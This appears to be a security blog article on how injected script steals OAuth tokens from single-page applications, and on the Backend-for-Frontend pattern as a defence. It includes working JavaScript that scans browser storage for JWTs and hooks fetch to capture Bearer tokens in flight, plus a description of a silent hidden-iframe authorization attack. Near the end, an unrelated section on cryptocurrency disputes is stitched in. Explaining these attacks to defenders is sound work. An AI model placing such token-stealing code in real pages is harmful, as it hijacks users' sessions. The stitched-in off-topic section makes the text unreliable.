Explore the security challenges in single-page applications (SPAs) and how the Backend-for-Frontend (BFF) pattern offers a robust defence against token theft and XSS attacks.

In web application security, staying ahead of threats is essential. The picture around Backend-for-Frontend (BFF), token theft and browser-side security keeps shifting, and it calls for a proactive approach.
The SPA Security Paradox
Single-Page Applications (SPAs) have transformed user experience with their speed and interactivity, but they bring a hard security problem: where to keep access tokens in the browser. A traditional server-rendered application holds its tokens on the server, behind a session cookie. An SPA holds them in the browser, where any script running in the page, including script injected through a Cross-Site Scripting (XSS) flaw, can reach them.
The Problem: Tokens in the Frontend
An SPA is a "public client" in OAuth terms: it runs entirely in the user's browser and cannot keep a secret. Whether tokens sit in localStorage, sessionStorage or a JavaScript variable, they live in the same origin as any injected code, so an XSS payload can read them and send them to the attacker. A stolen access token is usable until it expires; a stolen refresh token lets the attacker mint new ones.
Attack Vectors: Single-Execution and Persistent Token Theft
Attackers use several methods. In single-execution token theft, injected JavaScript runs once, scans the storage locations for anything that looks like a token and exfiltrates it. In persistent token theft, the injected code keeps running alongside the application and relays each new token to the attacker as the application obtains it. This variant defeats refresh token rotation: the attacker only ever uses tokens that the legitimate client itself obtained, so the authorization server never sees a refresh token presented twice. The steady stream of fresh tokens works like a heartbeat signal for the attacker, and nothing on the server side looks anomalous.
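The two theft patterns above, written out as an added illustration (this is not code from the original article). It runs in Node against a constructed stand-in for a browser: the storage objects, the fake fetch and the token strings are all made up, and the exfiltrate callback just records what an injected script would have sent out. The scanner also looks inside JSON blobs, because popular OIDC client libraries store tokens that way; the fetch hook shows why in-memory storage does not stop persistent theft, since the token still passes through fetch on every API call.

```javascript
// JWT shape: three base64url segments joined by dots. A scanner keys on the
// shape, not on storage key names, so renaming "access_token" does not help.
const JWT_RE = /^[A-Za-z0-9_-]{8,}\.[A-Za-z0-9_-]{8,}\.[A-Za-z0-9_-]{8,}$/;

// Walk a storage value: plain JWT strings, JSON strings, and nested objects.
function collectJwts(value, path, out) {
  if (typeof value === "string") {
    if (JWT_RE.test(value)) {
      out.push({ path, token: value });
    } else if (value.startsWith("{")) {
      try { collectJwts(JSON.parse(value), path, out); } catch (_) { /* not JSON */ }
    }
  } else if (value && typeof value === "object") {
    for (const [k, v] of Object.entries(value)) collectJwts(v, `${path}.${k}`, out);
  }
}

// Single-execution theft: one pass over every storage area the script can read.
function scanStorageForTokens(storages) {
  const found = [];
  for (const [area, store] of Object.entries(storages)) {
    for (const [key, value] of Object.entries(store)) collectJwts(value, `${area}.${key}`, found);
  }
  return found;
}

// Persistent theft: replace the page's fetch so every Bearer token is copied
// out at the moment the application uses it. Where the token was stored,
// or whether it was stored at all, no longer matters.
function installFetchHook(globalObj, exfiltrate) {
  const realFetch = globalObj.fetch;
  globalObj.fetch = function hookedFetch(input, init) {
    const headers = (init && init.headers) || {};
    const auth = headers.Authorization || headers.authorization;
    if (typeof auth === "string" && auth.startsWith("Bearer ")) exfiltrate(auth.slice(7));
    return realFetch.call(globalObj, input, init);
  };
}

// Constructed sample tokens (syntactically JWT-shaped, not real credentials).
const STORED_JWT = "eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJhbGljZSIsImlhdCI6MX0.c2lnbmF0dXJlLW9uZQ";
const MEMORY_JWT = "eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJhbGljZSIsImlhdCI6Mn0.c2lnbmF0dXJlLXR3bw";

// Constructed browser: two storage areas and a fetch that never touches the network.
function demoTokenTheft() {
  const exfiltrated = [];
  const browser = {
    localStorage: { theme: "dark", access_token: STORED_JWT },
    sessionStorage: {
      "oidc.user:https://idp.example.test": JSON.stringify({
        access_token: STORED_JWT,
        profile: { sub: "alice" },
      }),
    },
    fetch: () => ({ status: 200 }),
  };
  installFetchHook(browser, (t) => exfiltrated.push(t));

  // Vector 1: scan what is at rest.
  const atRest = scanStorageForTokens({
    localStorage: browser.localStorage,
    sessionStorage: browser.sessionStorage,
  });

  // Vector 2: the application makes a normal API call with a token it keeps
  // only in memory; the hook sees it anyway. A call without a token yields nothing.
  browser.fetch("https://api.example.test/me", { headers: { Authorization: `Bearer ${MEMORY_JWT}` } });
  browser.fetch("https://api.example.test/public", {});

  return { atRest, inFlight: exfiltrated };
}
```

demoTokenTheft() returns two stolen tokens from storage (one plain, one inside the JSON blob) and one captured in flight. The fetch hook is the part to remember when evaluating the "keep it in memory" advice: it captures the token without ever touching storage.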
Defensive Measures and Their Limitations
Short token lifetimes and refresh token rotation help, but they are not foolproof. They bound the damage from a single stolen token; they do nothing against persistent theft, because the malicious code is handed fresh tokens through the application's own flow. The current OAuth 2.0 guidance for browser-based apps describes keeping tokens in memory, isolated in a web worker so that application code never handles them directly. That stops a storage scan, but the worker still attaches the token to every API call on the page's behalf, so injected code can drive requests through it, and it does nothing against the next attack.
Acquisition of New Tokens: Bypassing Token Storage Altogether
A particularly insidious attack does not touch stored tokens at all. The injected script starts its own Authorization Code Flow in a hidden iframe, using the application's client_id and redirect_uri and a PKCE verifier it generated itself. Because the user already has a session with the token provider, the request carrying prompt=none completes silently, with no login screen or consent prompt. The redirect lands on the application's own origin, where the script reads the authorization code and exchanges it for a brand-new set of tokens. To the authorization server this looks exactly like the legitimate application renewing its session, so it cannot be told apart from a genuine request.
The Backend-for-Frontend (BFF) Pattern: A Robust Solution
The Backend-for-Frontend (BFF) pattern addresses this by moving token handling back to the server. The BFF is a confidential client: it runs the OAuth flow, holds the client secret and keeps the access and refresh tokens in a server-side session. The browser receives only an opaque session cookie, marked HttpOnly, Secure and SameSite, and calls APIs through the BFF, which attaches the token on the way out. Nothing in the browser can read or exfiltrate a token, and an attacker's silent authorization flow fails at the token endpoint for lack of the client secret. The SPA keeps its front-end architecture; only the token plumbing moves. The trade-off to keep in mind: injected script can still make requests through the user's session while the page is open, so the BFF needs CSRF protection and the usual session controls, and preventing XSS still matters.
The Persistent Threat of XSS: A Reality Check
Despite better browser defences and greater developer awareness, XSS is still a major threat. Modern attacks use vectors that bypass the traditional protections. Supply chain attacks, compromised browser extensions and DOM-based XSS are particularly concerning.
Supply Chain Attacks: The Silent Epidemic
A modern SPA pulls in hundreds of npm packages, and a single compromised package that ends up in the bundle gives the attacker full code execution in every user's browser. Content Security Policy (CSP) does not help here: it decides which sources may load scripts, and the compromised code ships inside the application's own trusted bundle, so CSP cannot distinguish it from the legitimate packages around it.
Ocean Protocol Controversy: A Reminder of Governance and Transparency
The recent dispute involving the Ocean Protocol Foundation, Fetch.ai and SingularityNET underscores the importance of governance and transparency in cryptocurrency alliances. Allegations of token misuse and fund mismanagement highlight the risks and challenges in decentralized ecosystems.
The Berachain network restart following a Balancer V2 vulnerability may seem unrelated, but it is another piece of the same puzzle. Both events show why continuous vigilance and sound security practice are needed.
Final Thoughts
Web application security is a wild ride. From SPA vulnerabilities to crypto controversies, there is always something new to keep us on our toes. Staying informed, adopting practices like the BFF pattern and keeping a healthy dose of scepticism are key to navigating these waters. Keep your wits about you, and let's build a more secure digital future, one line of code at a time.